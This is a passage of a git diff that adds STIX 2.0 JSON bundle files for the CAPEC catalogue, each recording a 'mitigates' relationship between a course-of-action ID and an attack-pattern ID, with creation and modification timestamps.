a/capec/relationship/relationship--4938d4d3-16de-4114-82b9-38a3e5be6fba.json b/capec/relationship/relationship--4938d4d3-16de-4114-82b9-38a3e5be6fba.json new file mode 100644 index 0000000000..654be1f55d --- /dev/null +++ b/capec/relationship/relationship--4938d4d3-16de-4114-82b9-38a3e5be6fba.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--688a4de7-a9e1-4a2c-b0e2-09fd32a1fe92", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4938d4d3-16de-4114-82b9-38a3e5be6fba", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--49eaee57-6195-456a-8340-de94e718e22a.json b/capec/relationship/relationship--49eaee57-6195-456a-8340-de94e718e22a.json new file mode 100644 index 0000000000..663bd8b58f --- /dev/null +++ b/capec/relationship/relationship--49eaee57-6195-456a-8340-de94e718e22a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--51b98fda-f678-4a83-8d12-d83f971ee827", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--49eaee57-6195-456a-8340-de94e718e22a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f", + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4a6ec7c1-23d0-4b8f-ac5c-22bc643a94d5.json b/capec/relationship/relationship--4a6ec7c1-23d0-4b8f-ac5c-22bc643a94d5.json new file mode 100644 index 0000000000..244a139e54 --- /dev/null +++ b/capec/relationship/relationship--4a6ec7c1-23d0-4b8f-ac5c-22bc643a94d5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1262bf81-151d-4567-aa82-d3efb22dd830", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4a6ec7c1-23d0-4b8f-ac5c-22bc643a94d5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460", + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4ae89b18-a464-4592-8968-9bb41ab779f0.json b/capec/relationship/relationship--4ae89b18-a464-4592-8968-9bb41ab779f0.json new file mode 100644 index 0000000000..b5e3e891c9 --- /dev/null +++ b/capec/relationship/relationship--4ae89b18-a464-4592-8968-9bb41ab779f0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--aa7e6668-2465-4dc3-a735-2c75c70997e8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4ae89b18-a464-4592-8968-9bb41ab779f0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--28d662f7-7950-46fd-9291-865c8a7da492", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4b292e1b-e5c9-4b4e-93b9-4b3bc7b99237.json b/capec/relationship/relationship--4b292e1b-e5c9-4b4e-93b9-4b3bc7b99237.json new file mode 100644 index 0000000000..d392bf8f58 --- /dev/null +++ b/capec/relationship/relationship--4b292e1b-e5c9-4b4e-93b9-4b3bc7b99237.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--13fc8772-4ceb-4cae-b346-98a985ed9f7e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4b292e1b-e5c9-4b4e-93b9-4b3bc7b99237", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--737b495b-88cf-4045-81ad-c988de02409e", + "target_ref": "attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4b4b6bd8-9567-4eb7-9f26-92bcd4c983dd.json b/capec/relationship/relationship--4b4b6bd8-9567-4eb7-9f26-92bcd4c983dd.json new file mode 100644 index 0000000000..7e73b310c2 --- /dev/null +++ b/capec/relationship/relationship--4b4b6bd8-9567-4eb7-9f26-92bcd4c983dd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--51a20f63-fd4d-41be-b40b-9c292980e04b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4b4b6bd8-9567-4eb7-9f26-92bcd4c983dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2018-05-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063", + "target_ref": "attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4b5b441e-ca75-44a1-8434-64a9ad7ad4eb.json b/capec/relationship/relationship--4b5b441e-ca75-44a1-8434-64a9ad7ad4eb.json new file mode 100644 index 0000000000..f8ae04682e --- /dev/null +++ b/capec/relationship/relationship--4b5b441e-ca75-44a1-8434-64a9ad7ad4eb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d88fc2a1-adb1-4458-9250-3ee0856c2107", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4b5b441e-ca75-44a1-8434-64a9ad7ad4eb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4be0ecb0-9723-45f8-8061-11800e4edbc2.json b/capec/relationship/relationship--4be0ecb0-9723-45f8-8061-11800e4edbc2.json new file mode 100644 index 0000000000..3a64f763ab --- /dev/null +++ b/capec/relationship/relationship--4be0ecb0-9723-45f8-8061-11800e4edbc2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4c0e2e02-fc34-480c-8ee1-f3938d80b523", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4be0ecb0-9723-45f8-8061-11800e4edbc2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa5b4ae4-96b5-40a1-9f6f-873732b174a7", + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4bfa8d8c-d670-4b99-8b9c-2f08f32e3166.json b/capec/relationship/relationship--4bfa8d8c-d670-4b99-8b9c-2f08f32e3166.json new file mode 100644 index 0000000000..00b4e23e2c --- /dev/null +++ b/capec/relationship/relationship--4bfa8d8c-d670-4b99-8b9c-2f08f32e3166.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a45b96f4-4028-4fbc-82df-6b1152a6ab3d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4bfa8d8c-d670-4b99-8b9c-2f08f32e3166", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4c3b04af-8b60-4007-abda-506aac43bb8a.json b/capec/relationship/relationship--4c3b04af-8b60-4007-abda-506aac43bb8a.json new file mode 100644 index 0000000000..0dafb394dd --- /dev/null +++ b/capec/relationship/relationship--4c3b04af-8b60-4007-abda-506aac43bb8a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3ba624d3-dd5f-4124-a614-6be398e19cfe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4c3b04af-8b60-4007-abda-506aac43bb8a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2e2f760-3e91-480d-a010-51c7214317af", + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4c785d20-0748-4aca-b848-985dcea65400.json b/capec/relationship/relationship--4c785d20-0748-4aca-b848-985dcea65400.json new file mode 100644 index 0000000000..db6f0054a5 --- /dev/null +++ b/capec/relationship/relationship--4c785d20-0748-4aca-b848-985dcea65400.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--88181851-4329-4c96-a827-76828e9afef6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4c785d20-0748-4aca-b848-985dcea65400", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--62b2537e-f487-4110-9642-64ab6fa2d255", + "target_ref": "attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4c88411e-75aa-4bcd-9c3f-59ffa93bd362.json b/capec/relationship/relationship--4c88411e-75aa-4bcd-9c3f-59ffa93bd362.json new file mode 100644 index 0000000000..d757fae909 --- /dev/null +++ b/capec/relationship/relationship--4c88411e-75aa-4bcd-9c3f-59ffa93bd362.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--03b8f036-9a14-40cc-b685-2cd718cf10fa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4c88411e-75aa-4bcd-9c3f-59ffa93bd362", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4cca1ccd-e137-464d-ab7f-c8a3988a73a0.json b/capec/relationship/relationship--4cca1ccd-e137-464d-ab7f-c8a3988a73a0.json new file mode 100644 index 0000000000..8028a8d0d9 --- /dev/null +++ b/capec/relationship/relationship--4cca1ccd-e137-464d-ab7f-c8a3988a73a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3b63ae76-681f-45bb-a5c5-e3f3f7359b1a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4cca1ccd-e137-464d-ab7f-c8a3988a73a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d23ad838-17c7-483f-9c9e-409581bff898", + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4d534e82-995b-4514-b92f-1c323150cc3d.json b/capec/relationship/relationship--4d534e82-995b-4514-b92f-1c323150cc3d.json new file mode 100644 index 0000000000..903d70b909 --- /dev/null +++ b/capec/relationship/relationship--4d534e82-995b-4514-b92f-1c323150cc3d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b652c725-42a3-45e1-b4e2-c9d8124048f5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4d534e82-995b-4514-b92f-1c323150cc3d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4dc5a0f9-3494-4485-83a7-e9c8cbb222eb.json b/capec/relationship/relationship--4dc5a0f9-3494-4485-83a7-e9c8cbb222eb.json new file mode 100644 index 0000000000..04768e8f5e --- /dev/null +++ b/capec/relationship/relationship--4dc5a0f9-3494-4485-83a7-e9c8cbb222eb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--809aa435-ffa0-4b09-8313-ab0f0fee32d6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4dc5a0f9-3494-4485-83a7-e9c8cbb222eb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4", + "target_ref": "attack-pattern--9eb0b1bd-88c1-4fdd-ac6b-126f037807ce", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4dd07f35-9062-41e7-906b-fa082b33e7fe.json b/capec/relationship/relationship--4dd07f35-9062-41e7-906b-fa082b33e7fe.json new file mode 100644 index 0000000000..fbcfba23dd --- /dev/null +++ b/capec/relationship/relationship--4dd07f35-9062-41e7-906b-fa082b33e7fe.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d10de78a-6c93-4ac1-bf2b-e6414a4609d9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4dd07f35-9062-41e7-906b-fa082b33e7fe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce", + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4def2e05-a5c8-42b8-88f5-3e10020490fa.json b/capec/relationship/relationship--4def2e05-a5c8-42b8-88f5-3e10020490fa.json new file mode 100644 index 0000000000..250e32d52d --- /dev/null +++ b/capec/relationship/relationship--4def2e05-a5c8-42b8-88f5-3e10020490fa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2fcfbdf8-79c7-46c2-a501-4ff2d17fe5c7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4def2e05-a5c8-42b8-88f5-3e10020490fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3", + "target_ref": "attack-pattern--9d2b2f02-aa84-4ed1-8fb9-e0ee9f5fabc2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4df2531e-b3be-4f20-9ea3-404a1bf7e404.json b/capec/relationship/relationship--4df2531e-b3be-4f20-9ea3-404a1bf7e404.json new file mode 100644 index 0000000000..01475db19c --- /dev/null +++ b/capec/relationship/relationship--4df2531e-b3be-4f20-9ea3-404a1bf7e404.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--604dae1a-7a04-40f1-bab9-7b7a2fad1d6d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4df2531e-b3be-4f20-9ea3-404a1bf7e404", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a", + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4e987ce4-7103-4162-8b09-6b27cdbcc61b.json b/capec/relationship/relationship--4e987ce4-7103-4162-8b09-6b27cdbcc61b.json new file mode 100644 index 0000000000..216023c275 --- /dev/null +++ b/capec/relationship/relationship--4e987ce4-7103-4162-8b09-6b27cdbcc61b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--27586d07-ee14-465e-9997-53ca8a1c19ef", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4e987ce4-7103-4162-8b09-6b27cdbcc61b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9", + "target_ref": "attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4f032d86-62c0-45e0-bff3-1225fd6493f9.json b/capec/relationship/relationship--4f032d86-62c0-45e0-bff3-1225fd6493f9.json new file mode 100644 index 0000000000..676a731b6b --- /dev/null +++ b/capec/relationship/relationship--4f032d86-62c0-45e0-bff3-1225fd6493f9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d40a09e8-966b-4461-a58b-28b7c05fb36a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4f032d86-62c0-45e0-bff3-1225fd6493f9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--86f13639-9d3a-45a9-9a18-0771b109ae6d", + "target_ref": "attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4f514d35-bcdf-4cac-9b22-6b09cdd343c0.json b/capec/relationship/relationship--4f514d35-bcdf-4cac-9b22-6b09cdd343c0.json new file mode 100644 index 0000000000..640adf8930 --- /dev/null +++ b/capec/relationship/relationship--4f514d35-bcdf-4cac-9b22-6b09cdd343c0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bd4dee7c-f8f2-467f-b2f6-8be831416a23", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4f514d35-bcdf-4cac-9b22-6b09cdd343c0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1924d54e-1b4b-47d5-9a5a-ce7bacce5ac2", + "target_ref": "attack-pattern--8e9a80d8-2017-4faa-b83a-8c5b91beead4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4f7f95e1-cc77-4ae3-ab6c-667480d8c2bc.json b/capec/relationship/relationship--4f7f95e1-cc77-4ae3-ab6c-667480d8c2bc.json new file mode 100644 index 0000000000..049e151117 --- /dev/null +++ b/capec/relationship/relationship--4f7f95e1-cc77-4ae3-ab6c-667480d8c2bc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--52d7e8ee-0d27-478c-aa2d-3f170220d05b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4f7f95e1-cc77-4ae3-ab6c-667480d8c2bc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555", + "target_ref": "attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--4fbb06d8-f344-4a8e-943f-df784ff2b3f8.json b/capec/relationship/relationship--4fbb06d8-f344-4a8e-943f-df784ff2b3f8.json new file mode 100644 index 0000000000..0dfff95ffb --- /dev/null +++ b/capec/relationship/relationship--4fbb06d8-f344-4a8e-943f-df784ff2b3f8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--08168e0f-196c-49d4-9556-40590af202f2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--4fbb06d8-f344-4a8e-943f-df784ff2b3f8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--50242ad9-aedd-434c-925e-38a48594e658.json b/capec/relationship/relationship--50242ad9-aedd-434c-925e-38a48594e658.json new file mode 100644 index 0000000000..e69fab045a --- /dev/null +++ b/capec/relationship/relationship--50242ad9-aedd-434c-925e-38a48594e658.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c6975059-56b0-4090-9a9e-9c55f1f26031", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--50242ad9-aedd-434c-925e-38a48594e658", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a25af9dc-416e-42de-910b-f3f20a06a348", + "target_ref": "attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5030b26b-2e31-4ca9-b274-43bfc198a700.json b/capec/relationship/relationship--5030b26b-2e31-4ca9-b274-43bfc198a700.json new file mode 100644 index 0000000000..cc3b14bb32 --- /dev/null +++ b/capec/relationship/relationship--5030b26b-2e31-4ca9-b274-43bfc198a700.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ed1e8fa9-407d-4cf4-96f3-7246a9125710", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5030b26b-2e31-4ca9-b274-43bfc198a700", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--61cfd195-6c06-485f-851b-d522704db751", + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--5078b089-d7d2-44f7-a5c1-2bc5c6cf14e8.json b/capec/relationship/relationship--5078b089-d7d2-44f7-a5c1-2bc5c6cf14e8.json new file mode 100644 index 0000000000..ae75dbe955 --- /dev/null +++ b/capec/relationship/relationship--5078b089-d7d2-44f7-a5c1-2bc5c6cf14e8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1bcf7290-f597-4780-92e4-ab065beb463d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--5078b089-d7d2-44f7-a5c1-2bc5c6cf14e8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63", + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--508a8334-06c6-4698-9bec-1d301d20624b.json b/capec/relationship/relationship--508a8334-06c6-4698-9bec-1d301d20624b.json new file mode 100644 index 0000000000..bfaa780690 --- /dev/null +++ b/capec/relationship/relationship--508a8334-06c6-4698-9bec-1d301d20624b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9e33f933-cf5a-4485-98cd-a5b11a47c51a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--508a8334-06c6-4698-9bec-1d301d20624b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7d1c34a6-521a-45c1-bc71-b4630bbdcd64", + "target_ref": "attack-pattern--94a15e97-9ac6-4148-ab20-92fb3c4d5d9d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--513339b3-7600-479a-b0e5-2de24c0711d1.json b/capec/relationship/relationship--513339b3-7600-479a-b0e5-2de24c0711d1.json new file mode 100644 index 0000000000..45aaee47a0 --- /dev/null +++ b/capec/relationship/relationship--513339b3-7600-479a-b0e5-2de24c0711d1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--354312b2-f3ae-488f-90ca-1aafc4f1183e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--513339b3-7600-479a-b0e5-2de24c0711d1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1782e252-1717-4a56-8f06-144c25768ea0", + "target_ref": "attack-pattern--5aa9735e-f77e-463a-81b6-cc2d07b40c82", + 